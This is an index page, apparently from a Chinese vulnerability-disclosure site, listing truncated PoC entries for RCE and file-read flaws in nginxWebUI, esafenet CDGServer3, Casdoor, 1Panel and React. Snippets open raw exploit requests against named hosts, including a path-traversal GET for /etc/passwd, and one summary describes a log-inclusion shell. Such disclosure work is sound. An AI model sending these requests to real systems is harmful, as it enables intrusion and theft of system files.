- brief introduction
- Table of contents
- Latest documents
ND001 nginxwebui-runcmd-rce
一、漏洞描述 nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。 nginxWebUI后台提供执行nginx相关命令的接口,由于未对用户的输入进行过滤,………
myh0st - March 16, 2026, 2:13 p.m.
ND007 CVE-2025-55182 & CVE-2025-66478
漏洞复现脚本: https://github.com/assetnote/react2shell-scanner/blob/master/scanner.py#L332 复现数据包: ``` POST / HTTP/1.1 Host: a.xazlsec.com.cn:3210 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) App………
myh0st - Dec. 5, 2025, 10:15 a.m.
ND035 esafenet-docRenewApp-rce
漏洞接口 ``` POST /CDGServer3/docRenewApp?command=GETSYSTEMINFO HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537………
myh0st - Sept. 15, 2025, 10:44 a.m.
ND036 esafenet-SecureUsbConnection-rce
漏洞接口 ``` POST /CDGServer3/SecureUsbConnection?command=GETSYSTEMINFO HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Sa………
myh0st - Sept. 15, 2025, 10:43 a.m.
ND026 esafenet-restorefiles-lfi
poc ``` POST /CDGServer3/document/RestoreFiles;login HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 A………
myh0st - Sept. 15, 2025, 10:41 a.m.
ND037 esafenet-DecryptionApp-rce
漏洞接口 ``` POST /CDGServer3/DecryptionApp?command=GETSYSTEMINFO HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/5………
myh0st - Sept. 15, 2025, 10:36 a.m.
ND077 esafenet-autosignservice1-rce
漏洞复现 ``` POST /CDGServer3/AutoSignService1 HTTP/1.1 Host: dlp.tedu.cn:8080 User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 Cont………
myh0st - Sept. 15, 2025, 10:35 a.m.
ND001 casdoor-static-fileread
漏洞复现 ``` GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1 Host: portal.xazlsec.com User-Agent: Mozilla/5.0 Connection: close Referer: https://127.0.0.1/Main_Login.asp Accept-Encoding:………
myh0st - Sept. 10, 2025, 11:04 a.m.
ND990 代码执行漏洞包含日志文件拿shell
锁定目标初步尝试 在一次渗透测试做信息收集时,发现网站是ThinkPHPV5.0.5,通过泄露信息得到网站真实IP。 直接使用RCE漏洞,成功执行phpinfo。 初探绕过disable_functions 准备直接执行命令,弹shell,发现函数被禁用: 看了下disable_functions禁用了以下函数: 拿到shell再说,首先在日志中先写入一句话,然后利用文件包含去包含日志执………
myh0st - Sept. 9, 2025, 8:59 p.m.
ND003 CVE-2025-54424
CVE-2025-54424 CVE-2025-54424:1Panel 客户端证书绕过RCE漏洞 一体化工具 (扫描+利用) 漏洞简介 1Panel 是一个开源、现代化的 Linux 运维管理面板,提供图形化界面用于部署网站、管理服务器和运行服务。 受影响版本中,Agent 端 TLS 认证策略为 tls.RequireAnyClientCert,仅要求提供证书但不验证其可信性。攻击者可通过自………
myh0st - Sept. 5, 2025, 4:35 p.m.